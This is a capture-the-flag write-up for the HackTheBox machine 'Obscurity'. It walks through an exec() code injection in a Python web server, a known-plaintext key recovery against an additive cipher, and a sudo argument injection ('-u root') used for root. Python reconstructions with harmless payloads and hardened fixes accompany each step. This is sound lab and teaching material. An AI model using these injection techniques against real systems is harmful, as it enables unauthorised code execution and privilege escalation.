HackTheBox Writeup — Obscurity

Hello guys, I am Faisal Husaini. My username on HTB is "ferllen".

Port Scan

We get 2 open ports and 2 closed ports, so we now run a service scan on each of the open ports.

So on the open ports we see that one is SSH and the other is the web part, on 22 and 8080 respectively. I still don't know why Nmap gave results for closed ports.

Moving on to the web part.

Port 8080 — Web

We see that it's a webpage related to security; scrolling further down,

We see a Development section and also a message to the server devs that the source code of the web server is kept in a secret development directory under the filename "SuperSecureServer.py".

So we run a simple bash script to brute-force the directory name, requesting <candidate>/SuperSecureServer.py for each wordlist entry, and we get a successful hit: develop.

Now we try to access the source code.

We see it's a long piece of code, but reading each function carefully, we find one that looks interesting.

In the function serveDoc, we see that it calls exec on the path, so I copy some lines of the function to my local machine and try to exploit it manually first.

These lines were copied, and now we execute our Python script.

We see that we can get code execution just by terminating the statement with a semicolon and appending a call to os.system, which then runs our system commands.
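The injection described above, as an added example that reconstructs the pattern rather than copying the server's code: the requested path is str.format()-ed into a Python statement that is handed to exec(). The exact statement string (INFO), the variable names and the percent-encoding step are assumptions of this example; the payload records a harmless value instead of calling os.system so it can be run safely, and the fixed version shows the same output without exec.

```python
import os
import urllib.parse

# Reconstruction (an assumption, not the server's verbatim code) of the pattern
# the write-up describes in serveDoc: the requested path is str.format()-ed into
# a Python statement that is then handed to exec().
INFO = "output = 'Document: {}'"


def serve_doc_vulnerable(path):
    """Run the formatted statement and return (output, trace).

    trace is a list the injected statement can append to, so the proof that
    attacker-controlled code ran does not need to spawn a shell.
    """
    scope = {"os": os, "trace": []}
    exec(INFO.format(path), scope)      # path is never validated or escaped
    return scope["output"], scope["trace"]


def serve_doc_fixed(path):
    """Same result for a normal request, without exec: build the string directly."""
    return "Document: {}".format(path)


def build_payload(statement):
    """Close the open string literal, terminate the statement, append ours, and
    re-open a literal so the trailing quote from INFO still parses."""
    return "';" + statement + ";'"


def to_request_path(payload):
    """Percent-encode the payload for the GET request line (assumes the server
    decodes it before formatting, as most do)."""
    return "/" + urllib.parse.quote(payload, safe="")


if __name__ == "__main__":
    # Harmless proof: record the working directory instead of running os.system.
    proof = build_payload("trace.append(os.getcwd())")
    print(INFO.format(proof))                     # the statement exec() actually sees
    print(serve_doc_vulnerable(proof))
    # The real attack swaps in a shell command, e.g. build_payload('os.system("...")').
    print(to_request_path(proof))
```

The statement exec() sees for the proof payload is output = 'Document: ';trace.append(os.getcwd());'' , three valid statements in a row; the closing quote that INFO supplies ends up attached to the empty literal the payload re-opens, which is why the payload has to end with a quote.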

So here we try to get a reverse shell, and looking back at the netcat listener,

We got a reverse shell successfully; looking further at what we have here,

We have a user folder, robert, and inside that folder we see a lot of txt files and also py files. We also have the user.txt flag, which we currently can't read, as only the user robert has permission to read it.

We also see an interesting Python script, SuperSecureCrypt.py; looking at the code,

Looking more into the code,

The code uses addition and modulo to encrypt/decrypt the files, and we see that we have two text files, check.txt and passwordreminder.txt.

One text file has a clear-text message and the other the encrypted version, so we have a known plaintext/ciphertext pair. Since the cipher only adds the key, subtracting the plaintext from the ciphertext (modulo the same value) gives the key back, position by position.

Here I use some Python code to reverse the encryption.

Now we run the script.

We see we got a name, alexandrov, which actually wasn't fully decrypted, and I needed help from a friend here. So the full decryption was alexandrovich.

We now move on to decrypting passwordreminder.txt using the key we got, saving the result to a txt file in the tmp folder, and after reading the file we see the password is SecThruObsFTW.
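The key recovery and the decryption of the password reminder, as an added Python example (not the write-up's script and not SuperSecureCrypt.py itself): the cipher is modelled as "add the repeating key, reduce modulo 255", which is an assumption, since the write-up only says addition and modulo. The key alexandrovich and the password are from the write-up; the check-file plaintext and both ciphertexts are constructed here. The example also shows the edge case the write-up ran into: when the known plaintext is shorter than the key, only a prefix of the key can be recovered, because there is no ciphertext left to recover the rest from.

```python
# Assumptions: the modulus 255 and the per-character key repetition are assumed,
# not taken from the page. The key "alexandrovich" is from the write-up; the
# plaintext/ciphertext samples are constructed.
MOD = 255


def encrypt(text, key):
    """Add the repeating key to each character, reducing modulo MOD."""
    return "".join(chr((ord(c) + ord(key[i % len(key)])) % MOD) for i, c in enumerate(text))


def decrypt(text, key):
    """Inverse of encrypt: subtract the repeating key modulo MOD."""
    return "".join(chr((ord(c) - ord(key[i % len(key)])) % MOD) for i, c in enumerate(text))


def recover_keystream(plain, cipher):
    """Known-plaintext attack: ciphertext minus plaintext is the key byte at each position."""
    return "".join(chr((ord(c) - ord(p)) % MOD) for p, c in zip(plain, cipher))


def shortest_period(stream):
    """The shortest prefix that, repeated, reproduces the whole stream."""
    for n in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % n] for i in range(len(stream))):
            return stream[:n]
    return stream


def recover_key(plain, cipher):
    """Key from a plaintext/ciphertext pair. If the pair is shorter than the key,
    only a prefix of the key comes back; nothing can recover the rest."""
    return shortest_period(recover_keystream(plain, cipher))


KEY = "alexandrovich"
CHECK_PLAIN = "Encrypt this check file with the right key and compare the result."  # constructed
CHECK_CIPHER = encrypt(CHECK_PLAIN, KEY)
REMINDER_CIPHER = encrypt("SecThruObsFTW", KEY)  # constructed stand-in for passwordreminder.txt

if __name__ == "__main__":
    key = recover_key(CHECK_PLAIN, CHECK_CIPHER)
    print("full key:", key)
    # With only ten characters of known plaintext the attack stops at "alexandrov".
    print("partial key:", recover_key(CHECK_PLAIN[:10], CHECK_CIPHER[:10]))
    print("password:", decrypt(REMINDER_CIPHER, key))
```

The check file plaintext needs to be at least a couple of key lengths long for shortest_period to settle on the real key; with a long enough pair the recovered keystream is alexandrovich repeated and the period is found, while a pair of ten characters only ever yields alexandrov.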

We try connecting as user robert through SSH with the password we decrypted, log in successfully, and get the user flag.

Privilege Escalation

We see that user robert can run /usr/bin/python3 /home/robert/BetterSSH/BetterSSH.py through sudo without a password.

Checking the BetterSSH.py code,

Looking further down,

From the above code, we can see that once we have an authenticated session it runs sudo -u user followed by whatever command we type.

We get authenticated and are returned to a shell; using -l, we get an error in the output and then we see the usage text of the sudo command.

So now we know it is already running sudo; we just append the commands below.

These commands make sudo run bash as root, but we don't get any output back, so we try to get a reverse shell instead and check the netcat listener.
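The sudo argument injection above, as an added Python example that reconstructs the pattern the write-up describes rather than quoting BetterSSH.py: the script builds ['sudo', '-u', user] and appends the typed command split on spaces, so typing "-u root bash -c ..." produces sudo -u robert -u root bash -c ..., and the later -u wins. The function names, the use of subprocess pipes and the hardened builder are assumptions of this example; the hardened version rejects input that sudo would parse as an option and terminates sudo's option list with "--".

```python
import shlex
import subprocess

# Reconstruction (an assumption, not BetterSSH.py verbatim) of the pattern the
# write-up describes: after authentication the script builds ['sudo', '-u', user]
# and appends whatever the user typed, split on spaces.
def build_cmd_vulnerable(user, command):
    cmd = ["sudo", "-u", user]
    cmd.extend(command.split(" "))   # a leading "-u root" is parsed by sudo, not run as a command
    return cmd


def build_cmd_hardened(user, command):
    """Refuse input that sudo would parse as options, and terminate sudo's option
    list with '--' so nothing after it is ever read as a sudo flag."""
    args = shlex.split(command)
    if not args:
        raise ValueError("empty command")
    if args[0].startswith("-"):
        raise ValueError("command must not start with an option: %r" % args[0])
    return ["sudo", "-u", user, "--"] + args


def is_rejected(user, command):
    """True when the hardened builder refuses the input."""
    try:
        build_cmd_hardened(user, command)
    except ValueError:
        return True
    return False


def run(cmd):
    """Run the argv the way the reconstruction does: stdout/stderr are pipes that
    are only read back after the child exits, which is why an interactive bash
    shows nothing and a reverse shell is the practical way to use the root process."""
    proc = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    return proc.stdout.decode(errors="replace"), proc.stderr.decode(errors="replace")


if __name__ == "__main__":
    # What robert types at the BetterSSH prompt; the later -u overrides the first.
    typed = "-u root bash -c id"
    print(build_cmd_vulnerable("robert", typed))      # sudo -u robert -u root bash -c id
    print(build_cmd_hardened("robert", "id"))          # sudo -u robert -- id
    print(is_rejected("robert", typed))                # True
```

Even the hardened builder still hands an arbitrary command to sudo as the calling user, so the real fix for a wrapper like this is an allow-list of commands rather than argument filtering; the "--" only guarantees that the target user cannot be changed from inside the typed text.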

We got a reverse shell as root successfully; moving on to get the root flag.

